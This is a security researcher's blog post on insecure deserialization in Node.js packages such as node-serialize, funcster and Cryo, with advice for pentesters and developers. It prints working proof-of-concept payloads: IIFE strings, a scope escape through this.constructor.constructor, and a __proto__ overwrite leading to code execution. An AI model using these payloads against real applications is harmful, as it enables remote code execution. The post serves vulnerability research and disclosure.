At the ZeroNights 2017 conference, I spoke about “Deserialization vulnerabilities in various languages”. For my presentation, I used an interesting article about two serialization packages for Node.js. I showed them as examples of vulnerable deserialization implementations. In this post, I’d like to show the results of my own research and a new approach to attacking deserialization in JS.
Previous research
The article mentioned above talks about two packages: node-serialize and serialize-to-js. Both of them can serialize an object in JSON format, but unlike the standard functions (JSON.parse, JSON.stringify), they allow the serialization of almost any kind of object, including a Function (in JavaScript, a function is an object too). So, this is a valid object:
var obj = {
  field1: "value1",
  field2: function(){
    return 1;
  }
}
But if we serialize it using JSON.stringify, the function is dropped and we get only:
{"field1":"value1"}
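A quick way to observe this is the minimal sketch below. It uses only the built-in JSON functions; the variable names are illustrative.

```javascript
// JSON.stringify skips properties whose values are functions.
var obj = {
  field1: "value1",
  field2: function () {
    return 1;
  }
};

var serialized = JSON.stringify(obj);
console.log(serialized); // {"field1":"value1"}

// After a round trip the function property is gone.
var restored = JSON.parse(serialized);
console.log(typeof restored.field2); // undefined
```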
To support all kinds of objects, node-serialize internally uses eval.
{"anything_here":"_$$ND_FUNC$$_function (){console.log(1)}"}
This is what a serialized object with a function looks like. During the deserialization process, anything after the special tag _$$ND_FUNC$$_ goes directly to the eval function. Therefore, we can use an IIFE (as mentioned in the article) or write code directly (as mentioned in a comment on the article).
With an IIFE (Immediately-Invoked Function Expression), all we need to do is add () after the function, and it is invoked automatically as soon as it is defined during deserialization.
{"anything_here":"_$$ND_FUNC$$_function (){console.log(1)}()"}
{"anything_here":"_$$ND_FUNC$$_console.log(1)"}
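To make the mechanism concrete, here is a minimal sketch of an eval-based deserializer. It is a simplified stand-in and not node-serialize's actual source: the naiveUnserialize function and the sideEffects counter are hypothetical, and the payload only increments a counter instead of doing anything harmful.

```javascript
// Simplified stand-in for an eval-based deserializer (NOT node-serialize's real code).
const FUNC_TAG = "_$$ND_FUNC$$_";
let sideEffects = 0; // incremented by the payload so execution can be observed

function naiveUnserialize(json) {
  const obj = JSON.parse(json);
  for (const key of Object.keys(obj)) {
    const value = obj[key];
    if (typeof value === "string" && value.startsWith(FUNC_TAG)) {
      // Everything after the tag is evaluated as JavaScript.
      obj[key] = eval("(" + value.slice(FUNC_TAG.length) + ")");
    }
  }
  return obj;
}

// A plain function is only defined, not executed.
const benign = naiveUnserialize(
  JSON.stringify({ f: FUNC_TAG + "function (){ sideEffects++; return 1; }" })
);
const countAfterBenign = sideEffects;

// Appending () turns it into an IIFE that runs during deserialization.
const hostile = naiveUnserialize(
  JSON.stringify({ f: FUNC_TAG + "function (){ sideEffects++; return 1; }()" })
);

console.log(typeof benign.f, countAfterBenign); // function 0
console.log(hostile.f, sideEffects);            // 1 1
```

In the second call the property ends up holding the return value of the function rather than the function itself, which shows that the code already ran inside the deserializer.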
The next example is serialize-to-js. Although it doesn’t support functions as a type, its implementation is still insecure because it uses the following construction during the deserialization process:
return (new Function('"use strict"; return ' + str))()
where str is a value under the attacker’s control.
In practice, it’s just a variation of eval. So we can achieve RCE using either of the following payloads, as seen in the related issue:
console.log(`exploited`)
(function (){console.log(1)}())
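The effect of that construction can be reproduced in isolation. The sketch below wraps the quoted line in a helper whose name, unsafeRevive, is hypothetical; the payload only sets a flag on globalThis so that its execution is visible.

```javascript
// The construction quoted above, wrapped in a helper (the name is hypothetical).
function unsafeRevive(str) {
  return (new Function('"use strict"; return ' + str))();
}

// Intended use: turn a serialized literal back into a value.
const data = unsafeRevive("{ a: 1, b: [2, 3] }");
console.log(data.b.length); // 2

// Hostile use: any expression is evaluated, including an IIFE.
globalThis.revivedPayloadRan = false;
unsafeRevive("(function () { globalThis.revivedPayloadRan = true; return {}; }())");
console.log(globalThis.revivedPayloadRan); // true
```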
The safer way?
After my presentation at ZeroNights, I came across a serialization package from Yahoo. It supports serialization of functions too. However, the package doesn’t include any deserialization functionality and requires you to implement it yourself. Their example uses eval directly. So I was interested to see whether any packages support function serialization without using eval or similar functions.
Actually, there are a lot of serialization libraries (roughly 40 to 60). I looked through some of them and found that a safer way to deserialize is to use different constructors depending on the object type.
For example, a package returns new Function(params, body) for a function, where params and body are taken from specific JSON fields. In this case, the function is reconstructed, but an attacker cannot force its execution.
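A minimal sketch of that constructor-based approach follows. The record format (params and body fields) and the reviveFunction helper are assumptions made for illustration; real packages use their own field names.

```javascript
// Hypothetical record format: { params: [...], body: "..." }.
function reviveFunction(record) {
  if (!Array.isArray(record.params) || typeof record.body !== "string") {
    throw new TypeError("expected { params: string[], body: string }");
  }
  // The function is constructed here but never called.
  return new Function(...record.params, record.body);
}

globalThis.bodyRan = false;
const record = JSON.parse(
  '{"params":["a","b"],"body":"globalThis.bodyRan = true; return a + b;"}'
);
const add = reviveFunction(record);
const ranDuringRevive = globalThis.bodyRan; // nothing has executed yet

console.log(ranDuringRevive); // false
console.log(add(2, 3));       // 5, and only now does the body run
```

The revived function still contains untrusted code, so this only removes the "runs during deserialization" step. If the application later calls the function, the attacker's body executes.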
I’ve also found another vulnerable package, funcster. It is vulnerable to the same IIFE attack as the previous ones, so we (as attackers) can execute our code during the deserialization process. Here is an example of a payload:
{ __js_function: 'function testa(){var pr = this.constructor.constructor("return process")(); pr.stdout.write("param-pam-pam") }()' }
The package uses another approach for serialization/deserialization. During deserialization it creates a new module with exported functions from a JSON file. Here is part of the code:
return "module.exports=(function(module,exports){return{" + entries + "};})();";
The interesting difference here is that the standard built-in objects are not accessible, because they are out of scope. It means that we can execute our code, but cannot call built-in objects’ methods. So if we use console.log() or require(something), Node throws an exception like "ReferenceError: console is not defined".
However, we can easily get back access to everything because we still have access to the global context:
var pr = this.constructor.constructor("console.log(1111)")();
Here this.constructor.constructor gives us the Function constructor. We pass our code to it as an argument and call the resulting function immediately.
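The trick can be illustrated without funcster. In the sketch below, runIsolated is a hypothetical stand-in for a restricted scope: it simply shadows a few names with undefined parameters, which is not how funcster isolates code, but it is enough to show why reaching Function through this.constructor.constructor restores access to globals.

```javascript
// Hypothetical stand-in for a restricted scope (NOT funcster's mechanism):
// console, require and process are shadowed with undefined parameters.
function runIsolated(code) {
  const fn = new Function("console", "require", "process", "return (" + code + ");");
  return fn.call({}, undefined, undefined, undefined);
}

// Inside the restricted scope the name resolves to the shadowing parameter.
const direct = runIsolated("typeof console");

// A function created via this.constructor.constructor runs in the global scope.
const escaped = runIsolated('this.constructor.constructor("return typeof console")()');

console.log(direct);  // undefined
console.log(escaped); // object
```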
Step deeper with Prototype
While I was researching packages, I decided to look at the approaches used to attack deserialization in other languages. There, code execution is achieved by leveraging functions that operate on attacker-controlled data and are called automatically, either during the deserialization process or afterwards, when an application interacts with the newly created object. I looked for something similar to the “magic methods” of other languages.
Actually, there are a lot of packages that work in completely different ways. Still, after some experiments I came up with an interesting semi-universal attack. It is based on two facts.
Firstly, many packages use the following approach in the deserialization process. They create an empty object and then set its properties using square bracket notation:
obj[key]=value
where key and value are taken from the JSON.
Therefore, we as attackers are able to control practically any property of the new object. If we look through the list of properties, our attention is drawn to the __proto__ property. This property is used to access and change the prototype of an object. This means that we can change the object’s behavior and add or change its methods.
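The first fact can be checked with a few lines. The naiveRevive function below is a hypothetical reviver written for illustration; it copies parsed keys onto a fresh object with bracket notation, which is the pattern described above.

```javascript
// Naive reviver: copy every parsed key onto a fresh object with obj[key] = value.
function naiveRevive(json) {
  const parsed = JSON.parse(json);
  const obj = {};
  for (const key of Object.keys(parsed)) {
    obj[key] = parsed[key]; // for the key "__proto__" this calls the prototype setter
  }
  return obj;
}

const revived = naiveRevive('{"name":"guest","__proto__":{"isAdmin":true}}');

console.log(Object.keys(revived)); // [ 'name' ]
console.log(revived.isAdmin);      // true, inherited from the attacker's prototype
console.log(Object.getPrototypeOf(revived) === Object.prototype); // false
console.log({}.isAdmin);           // undefined, other objects are unaffected
```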
Secondly, calling some functions leads to the invocation of methods on their arguments. For example, when an object is converted to a string, its valueOf and toString methods are called automatically (more details here). So, console.log(obj) leads to the invocation of obj.toString(). Another example: JSON.stringify(obj) internally invokes obj.toJSON().
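The implicit calls can be observed with standard language features only. In this sketch the calls array is just a log for illustration; it records which method the engine invoked for each conversion.

```javascript
const calls = [];
const obj = {
  toString() { calls.push("toString"); return "text"; },
  valueOf() { calls.push("valueOf"); return 42; },
  toJSON() { calls.push("toJSON"); return { safe: true }; }
};

const asTemplate = `${obj}`;        // string conversion prefers toString
const asNumber = obj * 2;           // numeric conversion prefers valueOf
const asJson = JSON.stringify(obj); // JSON.stringify calls toJSON

console.log(asTemplate, asNumber, asJson); // text 84 {"safe":true}
console.log(calls); // [ 'toString', 'valueOf', 'toJSON' ]
```

None of the three methods is called by name in the application code, which is what makes them interesting as counterparts of "magic methods".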
Using both of these features, we can get remote code execution in the process of interaction between an application (Node.js) and an object.
I’ve found a nice example: the Cryo package, which supports both function serialization and square bracket notation for object reconstruction, but which isn’t vulnerable to IIFE, because it manages objects properly (without using eval & co).
Here is the code for serialization and deserialization of an object:
var Cryo = require('cryo');
var obj = {
  testFunc : function() {return 1111;}
};
var frozen = Cryo.stringify(obj);
console.log(frozen);
var hydrated = Cryo.parse(frozen);
console.log(hydrated);
The serialized JSON looks like this. Pretty tangled:
{"root":"_CRYO_REF_1","references":[{"contents":{},"value":"_CRYO_FUNCTION_function () {return 1111;}"},{"contents":{"testFunc":"_CRYO_REF_0"},"value":"_CRYO_OBJECT_"}]}
For our attack we can create a serialized JSON object with a custom __proto__. We can create our object with our own methods for the object’s prototype, but as a small trick, we can use an incorrect name for __proto__ (because we don’t want to overwrite the prototype of the object in our own application) and serialize it.
var obj = {
  __proto: {
    toString: function() {console.log("defconrussia"); return 1111;},
    valueOf: function() {console.log("defconrussia"); return 2222;}
  }
};
So we get the serialized object and rename __proto to __proto__ in it:
{"root":"_CRYO_REF_3","references":[{"contents":{},"value":"_CRYO_FUNCTION_function () {console.log(\"defconrussia\"); return 1111;}"},{"contents":{},"value":"_CRYO_FUNCTION_function () {return 2222;}"},{"contents":{"toString":"_CRYO_REF_0","valueOf":"_CRYO_REF_1"},"value":"_CRYO_OBJECT_"},{"contents":{"__proto__":"_CRYO_REF_2"},"value":"_CRYO_OBJECT_"}]}
When we send that JSON payload to an application, the Cryo package deserializes the payload into an object, but also changes the object’s prototype to our value. Therefore, if the application interacts with the object in some way, for example by converting it to a string, then the prototype’s method is called and our code is executed. So, it’s RCE.
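The chain can be reduced to a few lines that do not depend on Cryo. This is a sketch of the end state only, under the assumption that the functions have already been rebuilt without eval and are then assigned with bracket notation; the names attackerMethods and calls are illustrative.

```javascript
// Hypothetical result of hydration: the functions were rebuilt without eval,
// then assigned with bracket notation.
const calls = [];
const attackerMethods = {
  toString: function () { calls.push("toString"); return "1111"; }
};

const hydrated = {};
hydrated["__proto__"] = attackerMethods; // replaces the prototype of hydrated only

// Ordinary application code that never calls the method explicitly.
const message = "Received: " + hydrated;

console.log(message); // Received: 1111
console.log(calls);   // [ 'toString' ]
```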
I tried to find packages with similar issues, but most of them didn’t support serialization of functions. I didn’t find any other way to reconstruct functions in __proto__. Nevertheless, as many packages use square bracket notation, we can rewrite __proto__ for them too and spoil the prototypes of newly created objects. What happens when an application calls any prototype method of such objects? It may crash due to an unhandled TypeError exception.
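The crash scenario does not need function support at all. In the sketch below, naiveRevive is again a hypothetical bracket-notation reviver; the payload replaces an inherited method with a string, so the first call to that method throws.

```javascript
// Hypothetical bracket-notation reviver (no function support needed).
function naiveRevive(json) {
  const parsed = JSON.parse(json);
  const obj = {};
  for (const key of Object.keys(parsed)) {
    obj[key] = parsed[key];
  }
  return obj;
}

// The spoiled prototype shadows a built-in method with a non-callable value.
const revived = naiveRevive('{"id":7,"__proto__":{"hasOwnProperty":"oops"}}');

let caught = null;
try {
  revived.hasOwnProperty("id"); // the application expects the built-in method
} catch (err) {
  caught = err;
}

console.log(caught instanceof TypeError); // true
```

Without the try/catch, the exception would propagate and could terminate the process, which makes this a denial-of-service vector.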
In addition, I should mention that the whole idea potentially works for deserialization from any format (not only JSON). Once both features are in place, a package is potentially vulnerable. Another thing is that JSON.parse is not “vulnerable” to __proto__ rewriting.
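The behavior of JSON.parse can be verified directly. In this short check, the property name polluted is arbitrary.

```javascript
// JSON.parse stores "__proto__" as an ordinary own property.
const parsed = JSON.parse('{"__proto__":{"polluted":true}}');

console.log(Object.getPrototypeOf(parsed) === Object.prototype);        // true
console.log(Object.prototype.hasOwnProperty.call(parsed, "__proto__")); // true
console.log(parsed.polluted);                                           // undefined
```

The prototype only changes later, if some code copies that key onto another object with bracket notation or a similar assignment.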
function stringify == eval
While Googling, I came across another approach to serializing objects with functions. The idea is to first stringify the functions, then to JSON.stringify the whole object. “Deserialization” consists of the same steps in reverse order. Examples of such function stringifiers are the packages cardigan, nor-function and so on. All(?) of them are insecure (due to eval & co) and allow code execution using IIFE during unstringifying.
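The pattern can be sketched with the replacer and reviver arguments of the built-in JSON functions. The TAG marker and both helper names are hypothetical and do not reproduce the API of cardigan or nor-function; the payload only sets a flag on globalThis.

```javascript
const TAG = "__fn__:"; // hypothetical marker for stringified functions

// Step 1: stringify functions, then JSON.stringify the whole object.
function stringifyWithFunctions(obj) {
  return JSON.stringify(obj, (key, value) =>
    typeof value === "function" ? TAG + value.toString() : value
  );
}

// Reverse order: JSON.parse, then turn tagged strings back into code via eval.
function parseWithFunctions(json) {
  return JSON.parse(json, (key, value) =>
    typeof value === "string" && value.startsWith(TAG)
      ? eval("(" + value.slice(TAG.length) + ")")
      : value
  );
}

const roundTripped = parseWithFunctions(
  stringifyWithFunctions({ double: function (x) { return x * 2; } })
);
console.log(roundTripped.double(21)); // 42

// A tampered document with () appended executes during parsing.
globalThis.unstringifyRan = false;
const tampered = JSON.stringify({
  double: TAG + "function () { globalThis.unstringifyRan = true; }()"
});
parseWithFunctions(tampered);
console.log(globalThis.unstringifyRan); // true
```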
Conclusion
For pentesters: Look closely at square bracket notation and access to __proto__. It has good potential in some cases.
For developers: I’m writing here that some packages are vulnerable, but your application is only vulnerable when user input reaches the vulnerable function. Some packages are created in such an “insecure” way on purpose and will not be fixed. So don’t panic, and just check whether you depend on a non-standard serialization package and how you handle user input in it.
I shared information about both vulnerabilities with their maintainers using HackerOne’s program. A warning message has been added to the funcster package’s README. We were not able to reach Cryo’s developers.
PS: Thanks @lirantal from HackerOne for his cooperation on the above mentioned vulnerabilities.
Frequently asked questions
Serialization is a process that converts a structured data object stored in memory into a certain representative format (JSON, XML, binary, etc.). It is used to store data on disk, transmit it via a stream, and more. Deserialization converts serialized data back into a structured data object that is stored in memory and used by the application.
If you deserialize data into an object and assume that the data is trusted, the attacker may create serialized data in such a way that the application performs additional malicious operations during the deserialization process, which could lead even to remote code execution – this is a deserialization vulnerability. Some deserialization libraries in programming languages treat input data as safe and, by default, do not protect against such vulnerabilities.
Yes, deserialization vulnerabilities can happen in JavaScript. For example, if you use the node-serialize or serialize-to-js packages to serialize to JSON and then back to JavaScript objects, an attacker may easily achieve remote code execution. Many other similar libraries, out of approximately 40 to 60 packages, are vulnerable to insecure deserialization, too.
See a detailed example of hacking the node-serialize package to achieve remote code execution.
The built-in functions (JSON.parse()) are not vulnerable so you can use them safely. However, custom deserialization packages for JavaScript have different types of vulnerabilities, depending on the approach used to deserialize data. Some of these vulnerabilities, however, are the result of the intended library design, so they cannot be fixed. It is your responsibility as a developer to make sure that data that is deserialized is first sanitized.